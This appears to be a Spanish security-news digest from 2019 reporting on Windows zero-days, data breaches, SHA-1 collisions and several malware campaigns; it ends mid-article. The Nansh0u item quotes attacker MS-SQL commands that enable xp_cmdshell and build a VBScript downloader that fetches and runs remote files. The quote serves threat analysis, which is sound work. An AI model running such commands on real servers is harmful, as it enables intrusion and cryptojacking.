Se trata de una vulnerabilidad que permite la elevación de privilegios en sistemas Windows a través del abuso del navegador nativo Microsoft Edge. Si en otras ocasiones, la investigadora avisó previamente a Microsoft de los fallos encontrados, en esta ocasión decidió filtrar las vulnerabilidades sin previo aviso.

Conviene recordar que la investigadora ha estado filtrando exploits y pruebas de concepto para estas vulnerabilidades durante las dos últimas semanas. Esta última permitiría, a través de una aplicación especialmente diseñada para ello, la elevación de privilegios y la toma de control completa sobre el sistema mediante la inyección de una DLL maliciosa.

Si bien es cierto que los vídeos que actúan como prueba de concepto abusan de Microsoft Edge, la investigadora indica que se trata de una vulnerabilidad que implica unarace condition replicable en muchos otros paquetes.

El próximo día 11 de Junio, podrá comprobarse si Microsoft está al tanto de las vulnerabilidades y si incluye soluciones para las vulnerabilidades detectadas porSandboxEscaper.

El navegador web Firefox ahora bloquea las cookies de seguimiento de terceros de forma predeterminada

Como se prometió, Mozilla finalmente ha habilitado la función de «Protección de seguimiento mejorada» en su navegador Firefox de forma predeterminada, que a partir de ahora bloqueará automáticamente todas las cookies de seguimiento de terceros que permiten a los anunciantes y sitios web rastrear a los usuarios que navegan por las web.

Las cookies de seguimiento, también conocidas como cookies de terceros, permiten a los anunciantes controlar su comportamiento e intereses en línea, mediante los cuales muestran anuncios, contenido y promociones relevantes en los sitios web que visita.

Sin embargo, dado que las cookies de rastreo recopilan mucha más información sin requerir permisos explícitos de los usuarios y no hay control sobre cómo las usarían las compañías, la técnica también representa una amenaza masiva para la privacidad en línea de los usuarios. Para limitar este seguimiento extenso, Mozilla incluyó la opción «Protección de rastreo mejorada» como una función experimental en octubre del año pasado con el lanzamiento de Firefox 63 para bloquear «cookies de rastreo de terceros» conocidas compiladas por una herramienta de código abierto de anti-rastreo llamada Desconectar.

A partir de ahora, la configuración de «Protección de seguimiento mejorada» se habilitará de forma predeterminada para los nuevos usuarios que descarguen e instalen una copia nueva de Firefox, mientras que los usuarios existentes pueden habilitar la función manualmente o esperar a que Mozilla active la función para todos los usuarios en los próximos meses

Como activar la función de Protección de seguimiento

Para activar la función de Protección de seguimiento mejorada, simplemente siga los pasos a continuación:

  • Haga clic en el icono del menú de su navegador web Firefox.
  • Seleccione «Bloqueo de contenido».
  • Ve a tu configuración de «Privacidad y Seguridad».
  • Seleccione el engranaje «Custom».
  • Ahora seleccione «rastreadores de terceros» en «Cookies».

Más información:

Enable and disable cookies that websites use to track your preferences
https://support.mozilla.org/en-US/kb/enable-and-disable-cookies-website-preferences

Criminales roban datos de tarjetas de crédito de clientes de «Checkers» y «Rally’s»

Criminales roban datos de tarjetas de crédito de 103 restaurantes «Checkers» y «Rally’s»

La cadena de restaurantes «Checkers» y «Rally’s» ha descubierto en los últimos días que unos criminales han accedido a los datos de tarjetas de crédito de sus clientes que almacenaban en sus puntos de venta.

Según la famosa cadena de restaurantes, han descubierto un malware especialmente diseñado para robar datos de tarjetas de crédito en 103 de sus restaurantes. Según la investigación, los criminales no han obtenido otros datos de sus clientes más allá de los datos de sus tarjetas de crédito. Además, no todos los clientes de estos 103 restaurantes han sido afectados, los atacantes han obtenido los datos de una parte de los clientes.

Por el momento no se conoce la forma en la que los atacantes consiguieron instalar el software malicioso en los puntos de venta de los restaurantes. Uno de estos puntos de venta ha estado infectado por el malware desde diciembre de 2015, y ha estado capturando datos de tarjetas de crédito hasta marzo de 2018.

La compañía afirma que ha estado colaborando con las autoridades y con las compañías de tarjetas de crédito para detectar posibles usos fraudulentos de las tarjetas y detectar infecciones de malware en otros puntos de venta.

Por parte de la compañía, se recomienda a los clientes que revisen sus cuentas y los movimientos realizados con las tarjetas de crédito.

Más información:

Hackers Stole Customers’ Credit Cards from 103 Checkers and Rally’s Restaurants
https://thehackernews.com/2019/05/credit-card-checkers-restaurants.html

Infectados más de 50.000 servidores MS-SQL y PHPMyAdmin con un rootkit

Investigadores del Guardicore Labs publicaron el pasado 29 de mayo un amplio informe detallando una campaña de cryptojacking que atacaba a servidores MS-SQL (Windows) y PHPMyAdmin. Esta campaña fue seguida por Guardicore Labs en los meses de abril y mayo.

Esta campaña maliciosa ha sido bautizada como Nansh0u, una campaña realizada por cibercriminales chinos que consiguieron infectar cerca de 50.000 servidores. Una vez que los servidores eran comprometidos, se infectaron con payloads maliciosos y éstos a su vez, utilizaron un crypto-miner e instalaron un sofisticado rootkit de modo kernel para evitar de esta manera que el malware finalice y asegurando una persistencia en el equipo infectado.

Esta campaña no es un típico crypto-miner. Nansh0u lo que utiliza son técnicas que se ven a menudo en APTs, como certificados falsos y explotaciones de escalada de privilegios. El problema reside que para ataques de este tipo, existe un gran arsenal de herramientas que pueden caer en malas manos y provocar daños mayores.

A principios de abril, Guardicore detectó y se centró en tres ataques de los que encontró que tenían una IP ubicada en Sudáfrica . Una vez visto esto, siguieron buscando y encontraron nuevas campañas datadas en febrero, elevando el número de payloads maliciosos detectados a 20. Este es el timeline de la campaña.

Este timeline, combinado con un conjunto de 5 ataques y 6 conexiones inversas a los distintos servidores ya mencionados, sugieren que este proceso ha sido establecido por un proceso de desarrollo continuo el cual fue debidamente pensado por los cibercriminales.

Gracias a esta investigación, Guardicore demuestra el crecimiento exponencial del número de infecciones, llegando al doble de infecciones en tan sólo un mes.

Cada ataque realizado comenzó con una serie de intentos de autenticación con ataques de fuerza bruta a servidores MS-SQL, llegando a obtener acceso a cuentas con privilegios de administrador. Esto es ocasionado por una mala política de contraseña. permitiendo contraseñas por defecto o débiles.

Tras obtener acceso, se ejecutaron una serie de comandos MS-SQL que permitían, entre otras cosas, configurar los ajustes de los servidores, crear un script Visual-Basic en c:\ProgramData\1.vbs, ejecutar este script y descargar dos archivos via HTTP y finalmente correr ambos archivos.

"
EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell',
1;RECONFIGURE;
exec sp_configure 'show advanced options', 1;RECONFIGURE;exec sp_configure 'Ad Hoc Distributed
Queries',1;RECONFIGURE;
exec sp_configure 'show advanced options', 1;RECONFIGURE;exec sp_configure 'Ole Automation
Procedures
',1;RECONFIGURE


exec xp_cmdshell 'echo on error resume next >c:\ProgramData\2.vbs'
exec xp_cmdshell 'echo with wscript:if .arguments.count^<2 then .quit:end if >>c:\ProgramData\2.vbs'
exec xp_cmdshell 'echo set aso=.createobject("adodb.stream"):set web=createobject("microsoft.xmlhttp")
>>c:\ProgramData\2.vbs'
exec xp_cmdshell 'echo web.open "get",.arguments(0),0:web.send:if web.status^>200 then quit
>>c:\ProgramData\2.vbs'
exec xp_cmdshell 'echo aso.type=1:aso.open:aso.write web.responsebody:aso.savetofile
.arguments(1),2:end with >>c:\ProgramData\2.vbs'


exec xp_cmdshell 'cscript c:\ProgramData\2.vbs / c:\ProgramData\'
exec xp_cmdshell 'cscript c:\ProgramData\2.vbs / c:\ProgramData\'


exec xp_cmdshell 'c:\ProgramData\ c:\ProgramData\'
"

Los investigadores también elaboraron una lista completa de IoCs que publicaron en su Github y un script en Powershell que también hicieron público.

Como toda esta campaña comienza con una serie de intentos de accesos combinando usuarios y contraseñas por defecto o débiles para posteriormente proceder-como se ha comentado- a la infección de los distintos servidores; desde Hispasec recomendamos utilizar contraseñas robustas, que se cambien periódicamente y con 2FA para minimizar los daños de este y otros ataques.

Más información

Guardicore – The Nansh0u Campaign – Hackers Arsenal Grows Stronger
https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/

Noticias de Seguridad Mayo 2019

Hacker revela cuatro 0-days de Microsoft en menos de un día.

Tras hacer pública una vulnerabilidad en Windows 10, la investigadora conocida por el alias «SandboxEscaper» ha liberado más exploits para vulnerabilidades aun sin parchear.

  • Vulnerabilidad AngryPolarBearBug2

Esta vulnerabilidad reside en el servicio de reporte de errores de Windows y puede ser explotada usando una operación en la DACL (lista de control de acceso discreccional). Este mecanismo permite o deniega permisos de acceso a un determinado objeto.

En una explotación satisfactoria, un atacante podría editar o borrar cualquier fichero de windows.

Bautizada como AngryPolarBearBug2 por la hacker, esta vulnerabilidad es sucesora de de otra descubierta por la investigadora a finales del pasado año (AngryPolarBearBug).

Sin embargo, según SandboxEscaper, esta vulnerabilidad no es trivial explotarla y puede tomar mas de quince minutos en dispararse, ya que la ventana de tiempo en la que el bug puede ser aprovechado es muy pequeña.

  • Internet Explorer 11 Sandbox Bypass

La segunda vulnerabilidad publicada ayer por la investigadora SandboxEscaper afecta a Internet Explorer 11.

Aunque el README del exploit no contiene ningún detalle sobre esta vulnerabilidad, un video subido por la investigadora muestra como el bug existe debido a un error del navegador a la hora de manejar una DLL maliciosa.

Esto permitiría a un atacante saltarse el sandbox del navegador y ejecutar código arbitrario con permisos de integridad medios.

A pesar de que las vulnerabilidades publicadas no son críticas, es de esperar que Microsoft libere actualizaciones el próximo 11 de Junio.

SandboxEscaper (¿Thomas Vanhoutte?) tiene un amplio historial de liberar pruebas de concepto perfectamente funcionales para el sistema operativo Windows. El pasado agosto publicó otra vulnerabilidad en el programador de tareas de Windows en su cuenta de twitter, que fue bastante aprovechada por los hackers en su momento.

Podemos esperar mas exploits en los próximos días, pues la investigadora ha prometido hacerlos públicos.

Más información

Zero-Day: Internet Explorer 11 Sandbox Bypass
https://www.youtube.com/watch?v=vgDt4CrmoRI

Github angrypolarbearbug2
https://github.com/SandboxEscaper/polarbearrepo/tree/master/angrypolarbearbug2

Giuthub sandboxescape
https://github.com/SandboxEscaper/polarbearrepo/tree/master/sandboxescape

Filtrados datos de 4,5M de visitantes de la web de La Alhambra

En la filtración pueden encontrarse números de teléfono, DNI, emails, contraseñas en texto plano, cuentas corrientes y más información sensible.

El grupo español La 9 de Anonymous ha revelado una brecha de seguridad en la web de reservas de La Alhambra de Granada, monumento ubicado en la comunidad de Andalucía y visitado por millones de usuarios al año. No es necesario haber reservado a través de la web para verse expuesto, ya que la misma es utilizada por múltiples agencias de reservas.

La vulnerabilidad, al menos presente desde 2017, consistía en una inyección SQL de manual, que según ha podido confirmar Teknautas se trataría de un fallo de fácil explotación, y probablemente detectable usando herramientas accesibles por todo el mundo con SQLMap y sin demasiados conocimientos de seguridad. Además, la explotación resultaba mucho más sencilla debido a que el servidor no contaba con WAF.

La filtración incluye los datos de 4,5 millones de visitantes, abarcando número de teléfono, DNI, correo electrónico, dirección postal, edad y sexo, entre otros datos. Esta parte de la filtración no incluye contraseñas, al no usar la web login para los visitantes.

La que sí incluye contraseñas es la filtración de los datos de agencias de viajes. Cerca de 1000 agencias han visto sus datos expuestos, incluyendo contraseñas en texto plano, una clara negligencia penable por la Ley de Protección de Datos. Por si fuese poco, también se almacenaban las cuentas corrientes con su IBAN.

Hiberus, la empresa responsable del software comprometido, ha lanzado una nota de prensa intentando quitar gravedad a los hechos. En ella se afirma que se trataría de un «ataque informático profesional y organizado», y ha añadido en un comunicado enviado a El Confidencial que, «a fecha de hoy, cualquier incidente que haya podido ocurrir está resuelto y correctamente gestionado». Sin embargo, hay otras webs del mismo grupo que aún no han corregido el error.

Bien es cierto que otras webs que usan este mismo software, como pueden ser las de los museos de El Prado o el Thyssen, cuentan desde hace tiempo con una versión actualizada que corrige este error. Sin embargo, no se han preocupado de actualizar otras webs más pequeñas, o la de La Alhambra, como se ha revelado con esta filtración.

Tras lo sucedido, queda patente la necesidad de realizar auditorías antes del lanzamiento de una aplicación de este tipo. Porque errores tan graves como almacenar en texto plano las contraseñas, o las cuentas corrientes en la misma base de datos, son fáciles de detectar y solucionar.

Fuente:
Agujero en la web de entradas a la Alhambra: los datos de 4,5 M de visitantes, al descubierto:
https://www.elconfidencial.com/tecnologia/2019-05-22/alhambra-hiberus-sicomoro-patronato-generalife-junta-andalucia_2013846/

Reducida la complejidad del hash SHA-1

Hace 2 años Google ponía encima de la mesa el reloj de vida del cifrado SHA-1 demostrando su debilidad mediante un ataque por colisión (Entendemos colisión por dos flujos de datos distintos que comparten un mismo hash).

La semana pasada, mediante el estudio del ataque por colisión con prefijo elegido, se consiguió bajar aun más la complejidad que, en estos momentos, oscila entre 2^66,9 y 2^69,4. Para tener un baremo sobre el que trabajar, en 1995 se calculó que harían falta 2^80 combinaciones de media para llevar a cabo un ataque por fuerza bruta que buscase colisiones en prefijos idénticos, lo que sería muy laborioso, computacionalmente hablando, y menos práctico para un atacante ya que es el propio algoritmo el que decide los mensajes donde se encuentra la colisión.

Esta nueva técnica permite llevar a cabo ataques por colisión con unas premisas personalizadas, dejando atrás las colisiones «accidentales», lo que abre una nueva puerta a los atacantes para que puedan tener el control de los archivos que deseen duplicar o crear. Esto significa que un atacante podría falsificar cualquier fichero cifrado mediante SHA-1.

Cabe destacar que en 2005 se rompió el algoritmo SHA-1 de forma teórica y en 2017, académicos de Google, consiguieron el primer ataque de colisión SHA-1 exitoso del mundo, conocido como «SHAttered». Esta hazaña costó 110.000$.

Después de eso, tan solo 2 años más tarde, un equipo de investigadores de Francia y Singapur, apoyándose en el estudio de SHAttered, dio una nueva vuelta de tuerca al asunto y demostró de forma teórica un ataque por colisión con el prefijo elegido. Todo esto está recogido en este documento titulado: «Desde las colisiones a las colisiones con prefijo elegido en SHA-1«.

Es posible que pronto se vean los primeros ataques prácticos de colisión de prefijos elegidos en SHA-1, como pasó con MD5.

Más información:

Qué ha pasado con SHA-1 y el nuevo ataque. Una explicación sencilla
https://empresas.blogthinkbig.com/nuevo-ataque-sha-1-explicacion/

SHA-1 ha muerto, ataque de colisión con prefijo elegido
https://blog.segu-info.com.ar/2019/05/sha-1-ha-muerto-ataque-de-colision-con.html

Publicado exploit para vulnerabilidad no parcheada en Windows 10

Un investigador de seguridad ha publicado un exploit a modo de prueba de concepto para una vulnerabilidad no parcheada en Windows 10.

‘SandboxEscaper’, un investigador anónimo que ha hecho públicas varias vulnerabilidades de seguridad para Windows en los últimos meses (como esta que ya os contamos en Una Al Día), publicó ayer una prueba de concepto para una nueva vulnerabilidad de Windows 10.

Como es habitual en las publicaciones de este investigador, aún no existe ningún parche de seguridad que solucione el fallo, por lo que se recomienda extremar las precauciones al ejecutar ficheros descargados de Internet mientras se lanza el parche de seguridad.

La vulnerabilidad permite elevar privilegios en el sistema, de manera que puede ser utilizada por un atacante o malware que ya tenga acceso al sistema para obtener privilegios de sistema.

La prueba de concepto publicada hace uso de la función ‘SchRpcRegisterTask’, una función del programador de tareas de Windows para programar nuevas tareas en el sistema. El problema se encuentra en el chequeo de permisos, que no se realiza correctamente y permite configurar unos permisos arbitrarios para la tarea.

Fallo en el sistema de seguridad de Google, Titan

Google ha confirmado la existencia de un problema de seguridad en sus llaves de seguridad Titan.

Titan es un sistemas de seguridad que se compone de 2 llaves, una contiene una conexión USB y otra un dispositivo bluetooth el cual permite dar al usuario una doble autenticación a la hora de iniciar sesión en los servicios del gigante. El dispositivo USB daría cobertura ante un inicio de sesión en ordenadores convencionales, y el dispositivo bluetooth daría cobertura al inicio de sesión en dispositivos móviles. En pocas palabras, es un sistema similar a la doble autenticación o autenticación en 2 pasos.

El fallo reportado existe solo en la llave bluetooth y es debido a un fallo en la configuración de emparejamiento en le dispositivo bluetooth, por lo tanto la llave USB no se ve afectada por la vulnerabilidad.

Con esta vulnerabilidad, un atacante con los conocimientos adecuados podría sincronizarse con la llave bluetooth en el momento del inicio de sesión de la víctima (momento en el que la víctima aprieta el botón) y saltarse esta doble autenticación.

Inmediatamente Google se ha puesto en contacto con los usuarios que tengan una versión de Titan vulnerable alertando de la utilización de la llave bluetooth hasta que Google reemplace dicha llave por otra con la vulnerabilidad corregida. Para saber si una llave es vulnerable, tan solo hay que mirar si en la parte trasera contiene el texto ‘T1’ o ‘T2’, si es así, la llave sería vulnerable.

A pesar de esta vulnerabilidad y de los efectos que podría causar si una cuenta se viese comprometida, Google intenta tranquilizar a los usuarios basándose en la complejidad para realizar el ataque con éxito, ya que el atacante debería de cumplir 3 requisitos.:

  • Tener amplios conocimiento sobre la materia.
  • Estar a unos 10 metros de distancia en el momento en que al víctima realiza esta doble autenticación.
  • Conocer el usuario y contraseña de la víctima.

Actualmente el dispositivo de seguridad Titan solo está disponible en EEUU y está en duda la expansión de este dispositivo a otras partes del mundo.

Más información:

Google Security Blog
https://security.googleblog.com/2019/05/titan-keys-update.html

Google presentará mejoras de privacidad para las cookies y su navegador.

Google anunció recientemente su intención de introducir al menos dos nuevas características relacionadas con la privacidad y la seguridad de los usuarios que serán implementadas en las próximas versiones de su popular navegador, Google Chrome.

La finalidad es facilitar un aumento del control, por parte del usuario, del seguimiento web que se le realiza a través de las cookies y a través de su navegador. Para ello, nos adelanta dos nuevas características para configurar la experiencia de navegación. En primer lugar, una versión mejorada de la cabecera SameSite en las cookies. Por otro lado, una suerte de protección contra la detección de huellas (Fingerprinting). Así mismo, parece ser que ambas características entrarán en pruebas a finales de este año.

Las cookies, como es conocido, son pequeños archivos de información que se almacenan localmente en las máquinas de los usuarios y que tienen por objeto facilitar un seguimiento de sus preferencias o hábitos en aras de ofrecer una experiencia personalizada. Son creadas por el navegador para, por ejemplo, recordar tu nombre de usuario, tu lenguaje preferido, o medir ciertos hábitos de navegación.

Sin embargo, las cookies son también el principal mecanismo para recibir contenidos comerciales específicos y altamente segmentados, afectando así directamente a la privacidad del usuario, en la medida en que se utilizan sus hábitos de uso para elaborar un perfil comercial sobre el cual el usuario carece de control, con la intención de adscribirlo a determinados segmentos comerciales y recibir publicidad o influir en su experiencia de navegación de múltiples modos.

Siendo consciente de esto, Google ha afirmado que su intención es mejorar el modo en que funcionan las cookies cross-site para que, si el usuario lo desea, pueda controlar y distinguir de una manera más precisa aquellas cookies encargadas exclusivamente de almacenar sus preferencias básicas, como el idioma preferido, de aquellas cookies de terceros que poseen fundamentalmente un carácter comercial, no siempre autorizado.

En una extensa publicación, Google explica nuevos mecanismos que los desarrolladores web deberán seguir en los próximos meses para poder especificar, de una manera explícita, cuáles de sus cookies podrían ser utilizadas para realizar un seguimiento sobre los usuarios. De este modo, basándose en la actual construcción de la característica SameSite de las cookies, los desarrolladores tendrán la opción de establecer de un modo transparente el comportamiento de la cookie con las etiquetas Strict, Lax o None.

Según Google , estas características podrían tener un impacto positivo en la mitigación de ataques CSRF y Cross Site Scripting.

En cuanto al fingerprinting, se trata de una técnica ampliamente establecida que permite, mediante el estudio del comportamiento durante la comunicación de los distintos navegadores con multitud de dispositivos, establecer suficientes regularidades como para posibilitar un seguimiento de cada dispositivo, sin ningún tipo de control por parte del usuario final.

Para evitar esto, resulta fundamental restringir los modos en que los dispositivos pueden ser escaneados, aunque se se utilicen medios pasivos o no intrusivos, dado que es un procedimiento opaco y ajeno a la voluntad del usuario.

Sin embargo, Google también reconoce que estas características posibilitan usos que van más allá del simple seguimiento comercial o intrusivo de los usuarios y que, por ende, habrá que encontrar la manera de compatibilizar el respeto a la privacidad del usuario con los aportes útiles que poseen también estas características.

Más información:

https://web.dev/samesite-cookies-explained

https://thehackernews.com/2019/05/chrome-samesite-cookies.html

eyeDisk: el pendrive ‘que no se puede hackear’ vulnerable

3.png

eyeDisk es un proyecto gestado en la plataforma de financiación colectiva Kickstarter que se presenta como una unidad USB de almacenamiento seguro para la privacidad y los datos al utilizar un sistema de identificación biométrica para permitir el acceso al contenido únicamente al propietario. Para ello el contenido se encuentra cifrado mediante el algoritmo AES de 256 bits usando el patrón del iris del usuario. El fabricante afirma que es imposible recuperar o duplicar el contenido almacenado en eyeDisk incluso aunque se pierda el dispositivo o un tercero disponga del patrón del iris.

El investigador de seguridad David Lodge de Pen Test Partners, ha analizado una de estas unidades de almacenamiento y ha determinado que el nivel de seguridad implementado en eyeDisk tiene puntos débiles.

Si bien es verdad que eyeDisk se mostró inflexible a los intentos de engaño mediante fotografías o patrones de iris similares (como el del hijo del investigador) y en ningún caso se desbloqueó, también se descubrió que haciendo un uso normal del dispositivo, cuando el reconocimiento biométrico falla, una contraseña de respaldo es suficiente para acceder al contenido.

Examinando el software se determinó que el contenido de EyeDisk se desbloquea cuando el elemento autenticador del dispositivo envía una contraseña al software de control. Mediante el uso de Wireshark para analizar los paquetes de esta comunicación en tiempo real, el investigador descubrió que dicha contraseña se envía en texto plano y que, tanto si el proceso de autenticación es fallido como exitoso, el paquete enviado es el mismo.

Según las palabras de David Lodge, esto revela que el software recopila la contraseña primero desde el dispositivo, y posteriormente valida la contraseña ingresada por el usuario antes de enviar (o no) la contraseña de desbloqueo. Por lo tanto, es posible obtener la contraseña / hash, en texto claro, simplemente capturando el tráfico USB.

Pen Test Partners se puso en contacto con el equipo desarrollador de eyeDisk el pasado 4 de abril para proporcionar todos los detalles del análisis realizado y los problemas de seguridad descubiertos. Unos días después, el 9 de abril, eyeDisk confirmó que solucionaría el problema aunque sin especificar fecha.

Desde entonces el equipo de seguridad ha intentado comunicarse en varias ocasiones con el equipo de desarrollo de eyeDisk para indagar sobre el estado de la corrección e informar de sus intenciones de publicar el análisis en el plazo de un mes. Así, tras no recibir respuesta, han decidido divulgar los resultados de la investigación.

Mas info:
‘Unhackable’ eyeDisk flash drive exposes passwords in clear text
https://www.zdnet.com/article/unhackable-biometric-drive-exposed-passwords-in-clear-text/

eyeDisk, Unhackable USB Flash Drive
https://www.kickstarter.com/projects/eyedisk/eyedisk-unhackable-usb-flash-drive

eyeDisk
http://eyedisk.cn/

UAD 360 – Comienza la cuenta atrás

Después de 20 años en los que Una al día ha acompañado a los amantes de la ciberseguridad, estamos a un mes de que el sueño se haga realidad.

Los próximos días 7 y 8 de junio se celebrará en el Campus de Teatinos de la UMA, el 1º congreso de ciberseguridad, UAD360. El sitio elegido ha sido Málaga, ciudad que vio nacer a Una al día y, que con los años se está posicionando como un polo de ciberseguridad en el que empresas de todo el mundo están eligiendo como ciudad para implantarse.

El evento ha sido promovido por Una al día y organizado por la Universidad de Málaga e Hispasec. Además el evento contará con el patrocinio de la empresa Buguroo, la colaboración de Extenda y el apoyo institucional de Incibe.

Serán dos intensos días divididos en un primera jornada de talleres y una segunda de conferencias.

El evento comenzará con talleres sobre Exploiting, Pentesting sobre Windows e Inteligencia Artificial. El sábado será el día de las conferencias.Bernardo Quintero, Soledad Antelada, Sergio de los Santos, David Ortiz y Fernando Díaz son los ponentes confirmados hasta el momento, solo faltará un ponente sorpresa por confirmar.

Además el sábado, previo al acto de clausura, organizaremos una mesa redonda en la que se tratará, con las partes interesadas, las salidas laborales que ofrece la ciberseguridad a día de hoy.

En paralelo a ambas actividades, se realizará un CTF (Capture the Flag), es decir, un campeonato de hacking ético en el que participarán los mejores especialistas en la materia.

Salvo para participar en el CTF, no se requiere de ninguna formación previa en ciberseguridad, tan solo tener inquietud en el tema y muchas ganas de aprender.

Os dejamos un enlace en el cuál podréis adquirir vuestra entrada, tened en cuenta que os haremos llegar algunos obsequios de la organización, y nos encargaremos de vuestra manutención durante el sábado.

Ya queda solo un mes, ¡no te quedes sin tu entrada!

Noticias de Seguridad Abril 2019

Karkoff’, el nuevo ‘DNSpionage’ con estrategia de focalización selectiva

Los cibercriminales detrás de la campaña de malware DNSpionage han encontrado una nueva manera de infectar a víctimas específicas con una nueva variante del malware DNSpionage.

DNSpionage fue descubierto por primera vez en noviembre del año pasado, y se basaba en sitios o documentos maliciosos para infectar a las víctimas con DNSpionage, una herramienta remota que utilizaba comunicaciones DNS y HTTP para comunicarse con el servidor que controlaba el atacante y que usaba para escribir en él los comandos a ejecutar en los equipos atacados.

Como se ha comentado, en la campaña anterior, se podía utilizar un documento de Word con una macro maliciosa para, de esta manera, infectar a la víctima. En esta nueva campaña utilizan un documento de Excel con una macro similar.

Antaño utilizaban el directorio .oracleServices, no obstante, para esta nueva campaña detectada en febrero, el atacante, para evitar que las reglas de los antivirus lo detecten, utiliza un directorio .msdonedrive y renombra al malware «taskwin32.exe».

Donde reside el éxito de esta nueva campaña de malware, es que ahora realizan reconocimientos previos de las posibles víctimas antes de infectarlas, lo que permite al atacante escoger una víctima en concreto e infectarla con una probabilidad de éxito mayor que si simplemente tratasen de infectar a varios equipos de forma masiva.

Los pasos que sigue esta nueva campaña son:

1.El malware emplea un archivo .bat (a.bat) para ejecutar el comando WMI y así obtener una lista con todos los procesos que estén corriendo sobre la máquina de la víctima.

wmi process list

2. El malware también identifica el username y el nombre de la máquina de la víctima. Finalmente utiliza la API NewWkstaGetInfo() con el nivel 100 para así recuperar información adicional de la máquina.

Este nivel devuelve información sobre el entorno de trabajo de la víctima, incluida información específica de la plataforma, el nombre de dominio, del equipo local e información relativa al sistema operativo. Es precisamente esta información que logra obtener, la que es clave para así poder seleccionar una víctima determinada tal y como se ha hecho alusión con anterioridad.

Es igualmente reseñable esta peculiar forma poco sofisticada de separar una misma string (caso del archivo \\Configure.txt, el cual separa en \\Conf y en igure.txt). Esto provocaría que, por ejemplo, la siguiente regla Yara no hiciese saltar la alerta al no coincidir el string que busca.

rule DNSpionage { 
strings: 
$conf="Configure.txt" 
condition: 
All of them 
}

Es precisamente esta anomia la que ocasiona que los antivirus como Avast oAvira (antivirus que el malware busca en la fase de reconocimiento dentro del sistema de la víctima y, en caso de encontrar alguno, realiza esta acción de separar el string) no alerten al usuario.

Estas eran las palabras de los investigadores que han detectado esta nueva campaña de malware sobre la fase de reconomiento que realiza Karkoff

«The malware searches for two specific anti-virus platforms: Avira and Avast. If one of these security products is installed on the system and identified during the reconnaissance phase, a specific flag will be set, and some options from the configuration file will be ignored,»

Karkoff, programado en .NET, permite al atacante ejecutar código arbitrario sobre la máquina víctima y de forma remota. Junto a todas sus características, también es interesante la funcionalidad por la cual genera un log con todos los comandos ejecutados sobre el sistema víctima con su fecha y hora.Son muchas las empresas y organizaciones que utilizan macros para reducir tareas repetitivas sin ser conscientes de cómo pueden estar perjudicando a la infraestructura de la organización. Así pues, se recomienda deshabilitar las macros, utilizar software antimalware de confianza y que se actualice en tiempo real, ser conocedores de las nuevas campañas de ingeniería social y de auditar los registros DNS tal y como recomendaron desde el Department of Homeland Security (DHS) para así reducir riesgos y posibilidades de sufrir ataques de DNS hijacking tales como los mencionados en este artículo

Más información

https://blog.talosintelligence.com/2019/04/dnspionage-brings-out-karkoff.html

CriptoCert: la primera certificación profesional española en criptografía

CriptoCert Certified Crypto Analyst. Así se ha denominado a la primera certificación técnica profesional española en criptografía.

De la mano de CriptoCert S.L., compañía española recientemente fundada y focalizada en la promoción, difusión, educación, capacitación técnica y certificación de profesionales en el campo de la criptografía y protección de la información, así como de su aplicación en el mundo real, nace CriptoCert Certified Crypto Analyst, la primera certificación técnica profesional de criptografía y protección de la información en español, que cuenta además con el reconocimiento del Centro Criptológico Nacional (CCN), centro responsable de la seguridad y protección de las comunicaciones de las administraciones públicas en España (adscrito al Centro Nacional de Inteligencia, CNI).

El objetivo principal de esta certificación es capacitar y acreditar de manera rigurosa a profesionales mediante contenidos técnicos extensos, detallados y actualizados. Como segundo objetivo, se plantea la difusión del uso de la criptografía y su utilización práctica, lo que se conoce como criptografía aplicada. Dado que uno de los fundamentos de la criptografía son las matemáticas, y aunque la certificación estudia los conceptos y principios matemáticos necesarios para comprender el funcionamiento de múltiples sistemas y protocolos criptográficos, y en cómo aplicar la criptografía de forma práctica en numerosos escenarios desde el punto de vista de la ingeniería, evita lo más posible profundizar en esa faceta más teórica.

En resumen, la ambición de esta innovadora iniciativa española es extender los complejos conocimientos vinculados al mundo de la criptología a un mayor número de profesionales de una manera clara y entendible, para que dispongan de las capacidades de análisis y comprensión de los elementos criptográficos, de cara a su aplicación en la protección de soluciones y entornos tecnológicos.

Hoy en día, la criptografía no sólo es una moda: ejemplos significativos de su utilización están presentes en el día a día en múltiples sistemas, aplicaciones, protocolos, comunicaciones, arquitecturas y dispositivos. Y es menester que los técnicos, ingenieros e incluso directivos de empresas, organizaciones, administración pública y otros entornos civiles o militares, conozcan cómo funciona la criptografía y sepan de sus fortalezas y de sus debilidades.

Más información: https://www.criptocert.com

TajMahal: detectado un nuevo APT Framework tras pasar 5 años desapercibido

Este framework, modular y de gran complejidad, habría estado en funcionamiento al menos desde 2014

1200px-Taj_Mahal_N-UP-A28-a

Investigadores han revelado el descubrimiento de un nuevo tipo de ‘APT Framework’ al que han nombrado como Taj Mahal, el monumento funerario ubicado en la ciudad de Agra, India. Esta nueva herramienta, tras conseguir acceder al ordenador de la víctima de una forma que todavía no ha sido esclarecida, divide su ataque en 2 paquetes con módulos y herramientas para la infección y lograr los objetivos deseados.

El primer paquete, denominado Tokio, contiene 3 módulos, backdoors, scripts de powerShell y servidores C&C. Incluye todas las herramientas necesarias para asegurar la infección de la máquina. Este paquete continúa en el equipo de la víctima como un backup por si el segundo paquete fuese eliminado.

El segundo paquete, Yokohama, es el encargado de obtener el resultado deseado del ataque. Incluye hasta 80 módulos almacenados en una unidad virtual cifrada, además de plugins, bibliotecas, archivos de configuración y más. Entre los módulos disponibles se encuentran herramientas de registro de pulsaciones de teclado, sustracción de cookies y datos (incluyendo backups de dispositivos Apple), captura de pantalla al utilizar aplicaciones VoIP, robo de información en CDs grabados, ficheros recurrentes utilizados en pendrives, documentos mandados a imprimir, etc.

Aunque existían indicios desde 2013 de la existencia de TajMahal, no fue hasta abril de 2014 que pudo confirmarse en el equipo de una víctima. Ha sido en otoño de 2018 que por fin ha podido descubrirse más al respecto. Sólo existe una víctima conocida de momento, una entidad diplomática de Asia Central, aunque podrían haber más casos de los que todavía no se ha dado constancia.

Fuente:

Project TajMahal – a sophisticated new APT framework
https://securelist.com/project-tajmahal/90240/

Fallo en la aplicación de iOS de WordPress filtró los tokens de acceso a terceros

WordPress ha solucionado recientemente una grave vulnerabilidad en su aplicación para iOS que, aparentemente, filtró tokens de autorización de los usuarios cuyos blogs usaban imágenes alojadas en sitios de terceros.

Explicación de la vulnerabilidad:

